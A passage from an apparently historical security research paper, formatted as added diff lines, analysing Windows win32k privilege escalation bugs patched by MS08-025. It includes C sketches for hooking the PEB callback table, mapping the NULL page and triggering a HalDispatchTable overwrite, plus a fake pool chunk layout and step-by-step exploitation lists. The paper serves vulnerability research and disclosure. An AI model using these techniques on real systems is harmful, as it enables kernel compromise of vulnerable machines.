+            *(ULONG *)MmUserProbeAddress = 0; // raise exception
+
+         *ReturnLength = 0;
+      }
+
+   } __except(EXCEPTION_EXECUTE_HANDLER) { // Catch exceptions
+      return GetExceptionCode();
+   }
+}
+
+[...] // Perform actions
+
+We can see that the arguments are tested in a very simple way before doing
+anything else. The ReturnLength field implements its own verification, which
+relies directly on MmUserProbeAddress. This variable marks the separation
+between the user-mode and kernel-mode address spaces. If the address is
+invalid, an exception is raised by writing to this variable, which is
+read-only. The ProbeForRead and ProbeForWrite verification routines raise an
+exception if an invalid address is encountered. However, the win32k driver
+does not always follow this pattern:
+
+BOOL NtUserSystemParametersInfo(
+      UINT uiAction,
+      UINT uiParam,
+      PVOID pvParam,
+      UINT fWinIni)
+
+[...] // Prepare local variables
+
+switch(uiAction)
+{
+   case SPI_1:
+      // Custom checks
+      break;
+   case SPI_2:
+      size = sizeof(Struct2);
+      goto prob_read;
+   case SPI_3:
+      size = sizeof(Struct3);
+      goto prob_read;
+   case SPI_4:
+      size = sizeof(Struct4);
+      goto prob_read;
+   case SPI_5:
+      size = sizeof(Struct5);
+      goto prob_read;
+   case SPI_6:
+      size = sizeof(Struct6);
+
+prob_read:
+      ProbeForRead(pvParam, size, 4);
+
+      [...]
+}
+
+[...] // Perform actions
+
+This function is very complex and this example presents only a small part of
+the checks. Some parameters need only classic verification while others
+implement their own. This elaborate code can create confusion, which improves
+the chances of a local privilege escalation. The issue comes from an unusual
+kind of kernel function that handles multiple features at the same time
+without implementing a standardized function prototype. The Windows kernel
+solved this issue for the NtSet* and NtQuery* functions by using two simple
+arguments: the first argument is a classical buffer and the second argument
+is its size. For example, the NtQueryInformationPort function will check the
+buffer in a generic way and then only verify that the size corresponds to the
+specified feature. The win32k design eases GUI development but makes code
+review very difficult.
+
+2.2) KeUserModeCallback utilization
+
+Typical interaction between user-mode and kernel-mode is done via syscalls. A
+user-mode module may request that the kernel execute an action and return
+needed information. The win32k driver has a callback system to do the exact
+opposite. The KeUserModeCallback function calls a user-mode function from
+kernel-mode. This function is undocumented and provided by the kernel module
+in a secure way in order to switch into user-mode properly. The win32k driver
+uses this functionality for common tasks such as loading a DLL module for
+event catching or retrieving information. The prototype of this function is:
+
+NTSTATUS KeUserModeCallback (
+     IN ULONG ApiNumber,
+     IN PVOID InputBuffer,
+     IN ULONG InputLength,
+     OUT PVOID *OutputBuffer,
+     IN PULONG OutputLength
+     );
+
+Microsoft did not make a system to retrieve arbitrary user-mode function
+addresses from the kernel. Instead, the win32k driver has a set of functions
+that it needs to call. This list is kept in an undocumented function table in
+the Process Environment Block (PEB) structure for each process. The ApiNumber
+argument refers to an index into this table.
+
+In order to return to user-mode, KeUserModeCallback retrieves the user-mode
+stack address from the saved user-mode context stored in the thread's
+KTRAP_FRAME structure. It saves the current stack level and uses ProbeForWrite
+to check whether there is enough room for the input buffer. The InputBuffer
+argument is then copied onto the user stack and an argument list is created
+for the function being called. The KiCallUserMode function prepares the return
+to user-mode by saving important information on the kernel stack. This
+callback system works like a normal syscall exit procedure, except that the
+stack level and the eip register have been changed. The callback starts in the
+KiUserCallbackDispatcher function.
+
+VOID KiUserCallbackDispatcher(
+   IN ULONG ApiNumber,
+   IN PVOID InputBuffer,
+   IN ULONG InputLength
+   );
+
+The user-mode function KiUserCallbackDispatcher receives an argument list
+which contains ApiNumber, InputBuffer, and InputLength. It does the
+appropriate function dispatching using the PEB dispatch table. When it is
+finished, the routine invokes interrupt 0x2b to transfer control back to
+kernel-mode. In turn, the kernel inspects three registers:
+
+ - ecx: contains a user-mode pointer for OutputBuffer
+ - edx: contains OutputLength
+ - eax: contains the return status
+
+The KiCallbackReturn kernel-mode function handles the 0x2b interrupt and
+passes the relevant registers as arguments to the NtCallbackReturn function.
+Everything is cleaned up using the information saved on the kernel stack, and
+control returns to the previously called KeUserModeCallback function with the
+proper output arguments set.
+
+The reader should notice that nothing is done to check output data. Each
+kernel function that uses the user-mode callback system is responsible for
+verifying output data. An attacker can simply hook the KiUserCallbackDispatcher
+function and filter requests to control the output pointer, size, and data.
+This user-mode callback can represent an important issue if its output is not
+verified as seriously as system call arguments.
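+
+To make this concrete, the following user-mode sketch shows how the PEB
+dispatch table could be intercepted. This is illustrative code written for
+this article rather than the author's exploit: the 0x2c offset of the
+KernelCallbackTable pointer within the 32-bit PEB, the table size, and the
+callback prototype are assumptions that vary across Windows versions.
+
+#include <windows.h>
+#include <winternl.h>
+#include <intrin.h>
+#include <string.h>
+#include <stdio.h>
+
+/* Assumed, undocumented callback prototype. */
+typedef NTSTATUS (NTAPI *KERNEL_CALLBACK_PROC)(PVOID InputBuffer,
+                                               ULONG InputLength);
+
+#define HOOKED_API_NUMBER  0x32  /* arbitrary index; 0x32 is used later in
+                                    this paper by xxxClientCopyDDEIn1 */
+#define ASSUMED_TABLE_SIZE 0x62  /* number of entries, an assumption */
+
+static KERNEL_CALLBACK_PROC OriginalCallback;
+static KERNEL_CALLBACK_PROC NewTable[ASSUMED_TABLE_SIZE];
+
+/* Replacement entry: inspect the request, then forward it.  A real attack
+ * would instead tamper with the data handed back to the kernel through the
+ * NtCallbackReturn path described above. */
+static NTSTATUS NTAPI FilterCallback(PVOID InputBuffer, ULONG InputLength)
+{
+    printf("callback 0x%x hit, input=%p len=%lu\n",
+           HOOKED_API_NUMBER, InputBuffer, InputLength);
+    return OriginalCallback(InputBuffer, InputLength);
+}
+
+void InstallCallbackHook(void)
+{
+    /* x86: the PEB address is at fs:[0x30]; KernelCallbackTable is assumed
+     * to be the pointer stored at PEB offset 0x2c. */
+    UCHAR *Peb = (UCHAR *)__readfsdword(0x30);
+    KERNEL_CALLBACK_PROC **TableSlot =
+        (KERNEL_CALLBACK_PROC **)(Peb + 0x2c);
+
+    /* Copy the existing table, swap one entry, point the PEB at the copy. */
+    memcpy(NewTable, *TableSlot, sizeof(NewTable));
+    OriginalCallback = NewTable[HOOKED_API_NUMBER];
+    NewTable[HOOKED_API_NUMBER] = FilterCallback;
+    *TableSlot = NewTable;
+}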
+
+3) Discovery and exploitation
+
+The win32k driver was patched by the MS08-025 bulletin[1]. This bulletin did
+not disclose any details about the issues, but it did talk about a
+vulnerability which allows privilege elevation through invalid kernel checks.
+This patch increases the overall driver security by adding multiple
+verifications. In fact, this patch was due to three different reported
+vulnerabilities. The following sections explain how these vulnerabilities were
+discovered and exploited.
+
+3.1) DDE Kernel pool overflow
+
+The Dynamic Data Exchange (DDE) protocol is a message system integrated into
+the GUI. Although the Windows operating system already has many different
+message mechanisms, this one shares data across processes by sharing GUI
+handles and memory sections. This feature is quite old but is still supported
+by Microsoft applications such as Internet Explorer, and it is used in
+application firewall bypass techniques. During the author's research on the
+win32k driver, he investigated how the KeUserModeCallback function was used.
+As described previously, this function does not directly verify output data.
+This lack of validation is what leads to this vulnerability.
+
+3.1.1) Vulnerability details
+
+The vulnerability exists in the xxxClientCopyDDEIn1 win32k function. It is
+not called directly, but it is used internally in the kernel when messages are
+exchanged between processes using the DDE protocol. In this context, the
+OutputBuffer verification is analyzed.
+
+In the xxxClientCopyDDEIn1 function:
+
+lea eax, [ebp+OutputLength]
+push eax
+lea eax, [ebp+OutputBuffer]
+push eax
+push 8 ; InputLength
+lea eax, [ebp+InputBuffer]
+push eax
+push 32h ; ApiNumber
+call ds:__imp__KeUserModeCallback@20
+mov esi, eax ; return < 0 (error ?)
+call _EnterCrit@0
+cmp esi, edi
+jl loc_BF92C6D4
+
+cmp [ebp+OutputLength], 0Ch ; Check output length
+jnz loc_BF92C6D4
+
+mov [ebp+ms_exc.disabled], edi ; = 0
+mov edx, [ebp+OutputBuffer]
+mov eax, _Win32UserProbeAddress
+cmp edx, eax ; Check OutputBuffer address
+jb short loc_BF92C5DC
+
+[...]
+
+loc_BF92C5DC:
+mov ecx, [edx]
+loc_BF92C5DE:
+mov [ebp+var_func_return_value], ecx
+or [ebp+ms_exc.disabled], 0FFFFFFFFh
+push 2
+pop esi
+cmp ecx, esi ; first OutputBuffer ULONG must be 2
+jnz loc_BF92C6D4
+xor ebx, ebx
+inc ebx
+mov [ebp+ms_exc.disabled], ebx ; = 1
+mov [ebp+ms_exc.disabled], esi ; = 2
+mov ecx, [edx+8] ; OutputBuffer - user mode ptr
+cmp ecx, eax ; Win32UserProbeAddress - check user mode ptr
+jnb short loc_BF92C602
+
+[...]
+
+loc_BF92C602:
+push 9
+pop ecx
+mov esi, eax
+lea edi, [ebp+copy_output_data]
+rep movsd
+mov [ebp+ms_exc.disabled], ebx ; = 1
+push 0
+push 'EdsU'
+mov ebx, [ebp+copy_output_data.copy1_size] ; we control this
+mov eax, [ebp+copy_output_data.copy2_size] ; and this
+lea eax, [eax+ebx+24h] ; integer overflow right here
+push eax ; NumberOfBytes
+call _HeavyAllocPool@12
+mov [ebp+allocated_buffer], eax
+test eax, eax
+jz loc_BF92C6B6
+
+mov ecx, [ebp+var_2C]
+mov [ecx], eax ; save allocation addr
+push 9
+pop ecx
+lea esi, [ebp+copy_output_data]
+mov edi, eax
+rep movsd ; Copy output data
+test ebx, ebx
+jz short loc_BF92C65A
+
+mov ecx, ebx
+mov esi, [ebp+copy_output_data.copy1_ptr]
+lea edi, [eax+24h]
+mov edx, ecx
+shr ecx, 2
+rep movsd ; copy copy1_ptr (with copy1_size)
+mov ecx, edx
+and ecx, 3
+rep movsb
+
+loc_BF92C65A:
+mov ecx, [ebp+copy_output_data.copy2_size]
+test ecx, ecx
+jz short loc_BF92C676
+mov esi, [ebp+copy_output_data.copy2_ptr]
+lea edi, [ebx+eax+24h]
+mov edx, ecx
+shr ecx, 2
+rep movsd ; copy copy2_ptr (with copy2_size)
+mov ecx, edx
+and ecx, 3
+rep movsb
+
+The DDE copydata buffer contains two different buffers with their respective
+sizes. These sizes are used to calculate the size of a buffer that is
+allocated. However, appropriate checks are not made to detect whether an
+integer overflow occurs. An integer overflow occurs when an arithmetic
+operation exceeds the maximum integer value and wraps around to a smaller
+value. As such, the allocated buffer may be smaller than each of the buffer
+sizes, which leads to a kernel pool overflow. The pool is the name used to
+designate the Windows kernel heap.
+
+3.1.2) Pool overflow exploitation
+
+The key to exploiting this issue lies in how to exploit a kernel pool
+overflow. Previous work has described the kernel pool system and its
+exploitation[8,9]. This paper will focus on exploiting the vulnerability
+being described.
+
+The kernel pool can be thought of as a heap. Memory is allocated by the
+ExAllocatePoolWithTag function and then freed using the ExFreePoolWithTag
+function. Depending on the memory size, a chunk header precedes the memory
+data. Exploiting a pool overflow involves replacing the next chunk header with
+a crafted version. This header is available through the ntoskrnl module
+symbols as:
+
+typedef struct _POOL_HEADER
+{
+    union
+    {
+        struct
+        {
+            USHORT PreviousSize : 9;
+            USHORT PoolIndex : 7;
+            USHORT BlockSize : 9;
+            USHORT PoolType : 7;
+        };
+        ULONG32 Ulong1;
+    };
+    union
+    {
+        struct _EPROCESS* ProcessBilled;
+        ULONG PoolTag;
+        struct
+        {
+            USHORT AllocatorBackTraceIndex;
+            USHORT PoolTagHash;
+        };
+    };
+} POOL_HEADER, *PPOOL_HEADER;   // sizeof(POOL_HEADER) == 8
+
+Size fields are expressed in multiples of 8 bytes, as an allocated block will
+always be 8-byte aligned. The Windows 2000 pool architecture is different:
+memory blocks are aligned on 16 bytes and the flag fields are simple UCHARs
+(no bitfields). The PoolIndex field is not important for our overflow and can
+be set to 0. The PoolType field contains the chunk state as a combination of
+flags. The busy flag changes between operating system versions, but a free
+chunk always has its PoolType field set to zero.
+
+During a pool overflow, the next chunk header is overwritten with malicious
+values. When the allocated block is freed, the ExFreePoolWithTag function will
+look at the next block's type. If the next block is free, it is coalesced by
+unlinking it and merging it with the current block. The LIST_ENTRY structure
+links blocks together and is adjacent to the POOL_HEADER structure when the
+chunk is free. The unlinking procedure is exactly the same as the behavior of
+the user-mode heap, except that no safe unlinking check is done. This
+procedure is repeated for the previous block. Many papers have already
+explained unlink exploitation, which allows writing 4 bytes to a controlled
+address. However, this attack breaks the pool's internal linked list and
+exploitation must take this into consideration. As such, it is necessary to
+restore the pool's list integrity to prevent the system from crashing.
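+
+The write primitive produced by this unsafe unlink can be summarized with the
+following C fragment. This is only an illustration of the coalescing logic
+described above (the equivalent of RemoveEntryList with attacker-controlled
+pointers), not actual kernel source:
+
+typedef struct _FAKE_LIST_ENTRY {
+    struct _FAKE_LIST_ENTRY *Flink;
+    struct _FAKE_LIST_ENTRY *Blink;
+} FAKE_LIST_ENTRY;
+
+/* Coalescing a "free" chunk whose header we control performs two writes
+ * with our Flink/Blink values, with no sanity check on either pointer. */
+static void UnsafeUnlink(FAKE_LIST_ENTRY *Entry)
+{
+    Entry->Flink->Blink = Entry->Blink;  /* *(Flink + 4) = Blink */
+    Entry->Blink->Flink = Entry->Flink;  /* *(Blink + 0) = Flink */
+}
+
+With Flink and Blink chosen as in the fake chunk shown below, the second write
+redirects a kernel function pointer to attacker-controlled code, while the
+first write clobbers the 4 bytes at Flink+4, which is why the chosen addresses
+must tolerate a stray 4-byte write.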
+
+There are a number of different targets that may be overwritten, such as code
+itself or the contents of a function pointer. In local kernel exploitation,
+the target address should be one that the kernel rarely uses, to prevent
+operating system instability. In his paper, Ruben Santamarta used a function
+pointer accessible through an exported kernel variable named
+HalDispatchTable[10]. This function pointer is used by KeQueryIntervalProfile,
+which is called by the system call NtQueryIntervalProfile. Overwriting the
+function pointer at HalDispatchTable+4 does not break system behavior in the
+default configuration, as this function is unsupported. Clean privilege
+escalation code should nevertheless consider restoring the overwritten data.
+For our exploitation, this is the best choice as it is easy to trigger and
+target.
+
+The exploitation code for this particular vulnerability should produce this
+fake chunk:
+
+Fake next pool chunk header for Windows XP / 2003:
+
+PreviousSize = (copy1_size + sizeof(POOL_HEADER)) / 8
+PoolIndex = 0
+BlockSize = (sizeof(POOL_HEADER) + 8) / 8
+PoolType = 0  // Free chunk
+
+Flink = Execute address - 4    // in userland - call +4 address
+Blink = HalDispatchTable + 4   // in kernelland
+
+Modification for Windows 2000 support:
+
+PreviousSize = (copy1_size + sizeof(POOL_HEADER)) / 16
+BlockSize = (sizeof(POOL_HEADER) + 15) / 16
+
+The Flink field points to a user-mode address minus 4 that will be called from
+the kernel address space once the function pointer at Blink has been replaced.
+When called by the kernel, the code at the user-mode address executes at ring0
+and is able to modify operating system behavior.
+
+In this specific vulnerability, to avoid a crash and to control the data
+copied into the target memory buffer, copy2_ptr should point to a NOACCESS
+memory page. When the copy occurs, an exception will be raised which will be
+caught by a try/except block in the function. When this exception is handled,
+the allocated buffers are freed. The copied memory size is controlled by the
+copy1_size field and the integer overflow is produced by the copy2_size field.
+This configuration allows overflowing only the necessary part.
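+
+Once HalDispatchTable+4 has been replaced, the corrupted pointer still has to
+be reached. As mentioned above, the usual trigger is the NtQueryIntervalProfile
+system call. The sketch below is illustrative; the ntdll prototype shown is
+undocumented and is resolved at runtime:
+
+#include <windows.h>
+
+/* Undocumented ntdll export; prototype assumed from public sources. */
+typedef LONG (NTAPI *NT_QUERY_INTERVAL_PROFILE)(ULONG ProfileSource,
+                                                PULONG Interval);
+
+/* Calling NtQueryIntervalProfile makes the kernel reach
+ * KeQueryIntervalProfile, which calls through HalDispatchTable+4, now
+ * pointing at our code. */
+void TriggerHalDispatchOverwrite(void)
+{
+    NT_QUERY_INTERVAL_PROFILE pNtQueryIntervalProfile =
+        (NT_QUERY_INTERVAL_PROFILE)GetProcAddress(
+            GetModuleHandleA("ntdll.dll"), "NtQueryIntervalProfile");
+    ULONG Interval = 0;
+
+    if (pNtQueryIntervalProfile != NULL)
+        pNtQueryIntervalProfile(2, &Interval); /* 2 = ProfileTotalIssues */
+}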
+
+3.1.3) Delayed free pool overflow on Windows Vista
+
+The allocation pool type in win32k on Windows Vista uses an undocumented
+DELAY_FREE flag. With this flag, the ExFreePoolWithTag function does not free
+a memory block but instead pushes it onto a deferred free list. If the kernel
+needs more memory or the deferred free list is full, it will pop an entry off
+the list and free it through normal means. This can cause problems because
+the actual free may not occur until many minutes later in a potentially
+different process context. Due to this problem, both the Flink and Blink
+pointers must be in the kernel-mode address space.
+
+The HalDispatchTable overwrite technique can be reused to support this
+configuration. The KeQueryIntervalProfile function disassembly shows how the
+function pointer is used. This context is always the same across Windows
+versions.
+
+mov     [ebp+var_C], eax
+lea     eax, [ebp+arg_0]
+push    eax
+lea     eax, [ebp+var_C]
+push    eax
+push    0Ch
+push    1
+call    off_47503C      ; xHalQuerySystemInformation(x,x,x,x)
+
+The first and second arguments (1 and 0Ch) are values that fall inside the
+user-mode NULL page when treated as addresses. This page can be allocated
+using the NtAllocateVirtualMemory function with an unaligned address inside
+the NULL page. The kernel function will round this pointer down to the lower
+page boundary and allocate the page. This page is also used in kernel NULL
+dereference vulnerabilities. In order to exploit this context, a stub of
+machine code must be found which returns into the first argument and where the
+following 4 bytes can safely be overwritten. This is the case for function
+epilogues, such as the one of the wcslen function:
+
+.text:00463B4C                 sub     eax, [ebp+arg_0]
+.text:00463B4F                 sar     eax, 1
+.text:00463B51                 dec     eax
+.text:00463B52                 pop     ebp
+.text:00463B53                 retn
+.text:00463B54                 db 0CCh ; alignment padding
+.text:00463B55                 db 0CCh
+.text:00463B56                 db 0CCh
+.text:00463B57                 db 0CCh
+.text:00463B58                 db 0CCh
+
+In this example, the 00463B51h address fits our needs. The pop instruction
+discards the return address and the retn instruction returns into the first
+argument, 1, which lies inside the NULL page. The alert reader will have
+noticed that the selected address starts at the dec instruction. The unlinking
+procedure overwrites the 4 bytes located at the selected address plus 4
+(00463B55h here), and the padding starting at 00463B54h provides 5 bytes that
+can safely be clobbered. Without this padding, overwriting unknown code could
+lead to a crash, compromising the exploitation. The location of this target
+address changes depending on the operating system version, but this type of
+context can be found using pattern matching. On Windows Vista, the
+vulnerability exploitation loops calling the NtQueryIntervalProfile function
+until the deferred free occurs and exploitation is successful. This loop is
+mandatory as the pool's internal structures must be corrected.
+
+3.2) NtUserfnOUTSTRING kernel overwrite vulnerability
+
+The NtUserfnOUTSTRING function is accessible through an internal table used by
+the exported NtUserMessageCall function. Functions whose names start with
+"NtUserfn" can be reached through the SendMessage function exported by the
+user32.dll module. For this function, the WM_GETTEXT window message is
+necessary. Notice that in some cases a direct call is needed for successful
+exploitation. The verifications made by the SendMessage function are trivial,
+as it is used for many different functions, but they should be taken into
+account. The MSDN website describes SendMessage usage[3].
+
+3.2.1) Evading the ProbeForWrite function
+
+The ProbeForWrite function verifies that an address range resides in the
+user-mode address space and is writable. If not, it will raise an exception
+that can be caught by a try / except code block. This function is used a lot
+by drivers which deal with user-mode inputs. The following is the start of
+the ProbeForWrite function's assembly:
+
+void __stdcall ProbeForWrite(PVOID Address, SIZE_T Length, ULONG Alignment)
+
+mov     edi, edi
+push    ebp
+mov     ebp, esp
+mov     eax, [ebp+Length]
+test    eax, eax
+jz      short loc_exit        ; Length == 0
+
+[...]
+
+loc_exit:
+pop     ebp
+retn    0Ch
+
+This short assembly dump highlights one way to evade the ProbeForWrite
+function. If the Length argument is zero, no verification is done on the
+Address argument. It means that Microsoft considers that a zero-length input
+does not require the address to point into userland. Microsoft published a
+blog post on MS08-025[12] explaining why ProbeForWrite was not modified as
+might have been expected. Microsoft's compatibility concerns are
+understandable, but the ProbeForWrite documentation should at least be updated
+to mention this case.
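+
+As an illustration of why this matters, consider the following hypothetical
+driver pattern (written for this article, not actual win32k source). If the
+caller can force cbOutput to zero, for instance by having a larger value
+masked down as shown in the next section, the user-supplied pointer is never
+validated at all and may even point into kernel memory:
+
+#include <ntddk.h>
+
+/* Hypothetical vulnerable pattern, for illustration only. */
+NTSTATUS CopyStringToCaller(PWSTR pOutput, ULONG cbOutput)
+{
+    __try {
+        /* cbOutput == 0: ProbeForWrite returns immediately and pOutput is
+         * never checked against the user/kernel boundary. */
+        ProbeForWrite(pOutput, cbOutput, sizeof(WCHAR));
+
+        /* ... later, a string is copied and null-terminated through
+         * pOutput, producing a 1- or 2-byte write at an arbitrary
+         * address. */
+    } __except (EXCEPTION_EXECUTE_HANDLER) {
+        return GetExceptionCode();
+    }
+
+    return STATUS_SUCCESS;
+}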
+
+3.2.2) Vulnerability details
+
+This vulnerability affects not only this function but a whole class of string
+management functions. Some functions make sure that the length argument is not
+zero before it is modified; others do not even check the length argument. A
+proof of concept for this vulnerability has been published by Ruben
+Santamarta[11].
+
+The NtUserfnOUTSTRING function vulnerability evades the ProbeForWrite function
+and overwrites 1 or 2 bytes of kernel memory. This function's disassembly is
+shown below:
+
+In NtUserfnOUTSTRING (WM_GETTEXT)
+
+xor     ebx, ebx
+inc     ebx
+push    ebx             ; Alignment = 1
+and     eax, ecx        ; eax = our size | ecx = 0x7FFFFFFF
+push    eax             ; If our size is 0x80000000 then
+                        ; Length is zero (avoid any check)
+push    esi             ; Our kernel address
+call    ds:__imp__ProbeForWrite@12
+or      [ebp+var_4], 0FFFFFFFFh
+mov     eax, [ebp+arg_14]
+add     eax, 6
+and     eax, 1Fh
+push    [ebp+arg_10]
+lea     ecx, [ebp+var_24]
+push    ecx
+push    [ebp+arg_8]
+push    [ebp+arg_4]
+push    [ebp+arg_0]
+mov     ecx, _gpsi
+call    dword ptr [ecx+eax*4+0Ch] ; Call appropriate sub function
+mov     edi, eax
+test    edi, edi
+jz      loc_BF86A623     ; Something goes wrong
+
+[...]
+
+loc_BF86A623:
+cmp     [ebp+arg_8], eax   ; Submit size was 0 ? (no)
+jz      loc_BF86A6D1
+
+[...]
+
+push    [ebp+arg_18]    ; Wide or Multibyte mode
+push    esi             ; Our address
+call    _NullTerminateString@8  ; <== 0 byte or short overwriting
+
+In this function, a large size (0x80000000) can bypass the ProbeForWrite
+verification. After this verification, it calls a function taken from an
+internal win32k function pointer table. Which function is called depends on
+the calling context: if the call happens on the same thread that owns the
+submitted handle, it goes directly to the retrieval function; otherwise the
+request can be queued by another function until the owning thread handles it.
+This assembly sample highlights the null byte overwrite that happens if the
+sub-function fails. The null byte ensures that a valid string is returned.
+This is not the only way to overwrite memory: by using an edit box, we could
+overwrite kernel memory with a custom string, but the first way fits our
+needs.
+
+The exploitation is trivial and will not be detailed in this section. The
+first vulnerability already exposed a target address and a way to allocate the
+NULL page, both of which were used to demonstrate this vulnerability.
+
+3.3) LoadMenu handle table corruption
+
+The win32k driver implements its own handle mechanism. This system shares a
+handle table between user-mode and kernel-mode. This table is mapped into the
+user-mode address space as read-only and is modified in the kernel-mode
+address space. The MS07-017 issue found by Cesar Cerrudo during the Month of
+Kernel Bugs (MOKB)[13] describes this table and how its modification could
+permit kernel code execution. This section addresses another vulnerability
+based on misuse of a shared GDI handle table entry.
+
+3.3.1) Handle table
+
+In the GUI architecture, a handle encodes different pieces of information,
+such as an index into the shared handle table and the object type. The handle
+table is an array of the undocumented HANDLE_TABLE_ENTRY structure.
+
+typedef struct _HANDLE_TABLE_ENTRY
+{
+    union
+    {
+        PVOID pKernelObject;
+        ULONG NextFreeEntryIndex;  // Used on free state
+    };
+    WORD  ProcessID;
+    WORD  nCount;
+    WORD  nHandleUpper;
+    BYTE  nType;
+    BYTE  nFlag;
+    PVOID pUserInfo;
+} HANDLE_TABLE_ENTRY; // sizeof(HANDLE_TABLE_ENTRY) == 12
+
+The nType field defines the table entry type.
+A free entry has a type of zero, and the nFlag field defines whether it is
+destroyed or currently in the destroy procedure. Normal handle verification
+routines check this value before fetching the pKernelObject field, which
+points to the associated kernel object. In a free entry, the
+NextFreeEntryIndex field contains the index of the next free entry, which is
+not a pointer but a simple unsigned long value.
+
+The GUI object structure depends on the object type, but every object starts
+with the same header, which contains the corresponding index in the shared
+handle table. This architecture relies on both elements: code switches between
+the table entry and the kernel object depending on its needs. A security issue
+exists if the handle table is not used as it should be.
+
+3.3.2) Vulnerability details
+
+The vulnerability itself exists in win32k's xxxClientLoadMenu function, which
+does not correctly validate a handle index. This function is called by the
+GetSystemMenu function and calls back to user-mode using the
+KeUserModeCallback function to retrieve a handle index. The following assembly
+shows how this value is used.
+
+and     eax, 0FFFFh         ; eax is controlled
+lea     eax, [eax+eax*2]    ; index * 3
+mov     ecx, gSharedTable
+mov     edi, [ecx+eax*4]    ; base + (index * 12)
+
+This assembly sample uses an unchecked handle index and fetches the
+pKernelObject field of the target entry. This pointer is returned by the
+xxxClientLoadMenu function. Proper verification is not made, which permits
+manipulation of deleted handles. A deleted handle has its NextFreeEntryIndex
+field set to a value between 0x1 and 0x3FFF, so the returned value will fall
+within the first memory pages.
+
+A system menu is linked to a window object. This window object is designated
+by a handle passed as an argument to the GetSystemMenu function. The
+spmenuSys field of the window object is set to the value returned by the
+xxxClientLoadMenu function. In this specific context, the spmenuSys value
+lands inside the NULL page, although its exact value is hard to predict.
+During thread exit, window cleanup will look at the spmenuSys object and,
+using its index into the shared table, toggle the nFlag field to destroyed and
+the nType field to free. If the NULL page is filled with zeroes, this will
+destroy the first entry in the GDI shared handle table.
+
+Exploitation is achieved by reusing the vulnerable functions once the first
+entry has been destroyed. The GetSystemMenu function locks and unlocks the GDI
+shared handle table entry linked with the kernel object returned by the
+xxxClientLoadMenu function. If the entry flag is marked destroyed, the unlock
+function calls the destroy callback for that type. For the first entry, the
+flag has been set to destroyed, and there is no callback for this type as it
+is not supposed to be unlocked. The unlock function will therefore call
+address zero, which allows kernel code execution. This specific handle
+management architecture remains undocumented, and the purpose of a destruction
+callback inside the unlocking procedure is unusual.
+
+Exploitation steps:
+
+  1. Allocate the NULL address (see the sketch after this list)
+  2. Exploitation loop - the second iteration triggers the call to zero:
+    a. Create a dialog
+    b. Set the NULL page data to zero
+    c. Set a relative jmp at address zero
+    d. Create a menu graphic handle (or another type)
+    e. Destroy this menu handle
+    f. Call GetSystemMenu
+    g. Intercept the user callback and return the destroyed menu handle index (handle & 0x3fff)
+    h. Exit this thread - this marks the zero handle entry as free and destroyed
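+
+Step 1 above (and the NULL page allocations used in sections 3.1.3 and 3.2)
+can be performed with NtAllocateVirtualMemory, as sketched below. This is
+illustrative code: the ntdll prototype is undocumented, and mapping the NULL
+page this way is only expected to work on older Windows versions such as those
+discussed in this paper.
+
+#include <windows.h>
+
+/* Undocumented ntdll export; prototype assumed from public sources. */
+typedef LONG (NTAPI *NT_ALLOCATE_VIRTUAL_MEMORY)(
+    HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
+
+/* Ask for an unaligned address inside the first page; the kernel rounds it
+ * down to 0 and maps the NULL page into our address space. */
+int MapNullPage(void)
+{
+    NT_ALLOCATE_VIRTUAL_MEMORY pNtAllocateVirtualMemory =
+        (NT_ALLOCATE_VIRTUAL_MEMORY)GetProcAddress(
+            GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
+    PVOID  Base = (PVOID)1;
+    SIZE_T Size = 0x1000;
+
+    if (pNtAllocateVirtualMemory == NULL)
+        return 0;
+
+    return pNtAllocateVirtualMemory(GetCurrentProcess(), &Base, 0, &Size,
+                                    MEM_RESERVE | MEM_COMMIT,
+                                    PAGE_EXECUTE_READWRITE) >= 0;
+}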
+
+There are multiple ways to exploit this vulnerability. The author believes
+that abusing the locking procedure in this manner could also be applied to
+handle leak vulnerabilities, as it was here. Exploitation of this
+vulnerability remains complex and unusual, and this specific context made it
+all the more interesting.
+
+4) GUI architecture protection
+
+Creating safe software is a hard task, definitely harder than finding
+vulnerabilities. This work is even harder when it concerns old components
+which must respect compatibility rules. This article does not blame Microsoft
+for those vulnerabilities; it presents global issues in the Windows
+architecture. With Windows Vista, Microsoft started securing its operating
+system environment, and the Windows Vista base code is definitely safer than
+it was. Some kernel components, such as the win32k driver, are still not safe
+enough and should be considered a priority for local operating system
+security.
+
+The GUI architecture does not respect security basics. Starting from scratch
+would certainly be a good option if it were possible. The global organization
+of this driver makes security audits a mess. On the other hand, the Windows
+API shows that it answers developers' needs. There is a large abstraction
+layer between the userland API and the kernel functions, and it could be used
+to rebuild the win32k driver without breaking compatibility. The API must
+follow user needs and be as easy to use as it can be, but there is no reason
+the functions exported by a kernel driver could not be reworked in a secure
+way. It represents an enormous amount of work that could only be spread
+across operating system versions; nevertheless, it is necessary. This
+modification could also increase performance by reducing unneeded context
+switching: there is no good reason to enter the kernel in order to ask
+userland for a value that will simply be returned to userland. The user-mode
+callback system does not fit in a consistent GUI architecture.
+
+Local exploitation techniques also highlight insecure components, such as the
+kernel pool, and show how overwriting certain function pointers allows kernel
+code execution. In the past, userland was hardened because exploitation was
+too easy and third-party software could allow a computer to be compromised.
+Kernel performance is critical, and adding verification routines and security
+measures could hurt that advantage. The solution should lie in operating
+system evolution that does not restrict the user experience. Hardware
+improvements do not excuse the fact that modern operating systems require
+more resources than before.
+
+Software development tends to follow the fastest path except when a specific
+result is expected: a company does not look for the best way, but for
+something that costs less for almost the same result. Microsoft did not choose
+the easy path when it started the Security Development Lifecycle (SDL)[14] and
+should continue in this direction.
+
+5) Conclusion
+
+The Windows kernel components have unequal levels of security verification.
+The main kernel module (ntoskrnl.exe) applies a standard set of checks when
+dealing with userland data. The win32k driver does not follow the same rules,
+which results in messy verification algorithms. This driver interacts heavily
+with userland through different mechanisms, from the usual syscalls to the
+userland callback system, and this architecture increases the attack surface.
+The vulnerable parts do not only involve the usual classes of vulnerabilities,
+but also internal mechanisms such as the GUI handle system.
+
+Chapter 3 presented the discovery and exploitation of the vulnerabilities.
+Local exploitation has many different attack vectors.
+Nowadays, exploitation is fast and reliable; it works on any attempt. Kernel
+exploitation is possible through different techniques.
+
+The win32k driver was not built with a secure design, and it has now become so
+huge, with so many compatibility restrictions, that every release just
+implements new features without changing anything else. Windows Vista
+introduces many modifications, but most of them are just automatic integer
+overflow checks. This will solve many unknown issues, but the interaction
+between user-mode and kernel-mode is hard to predict. Vulnerabilities are not
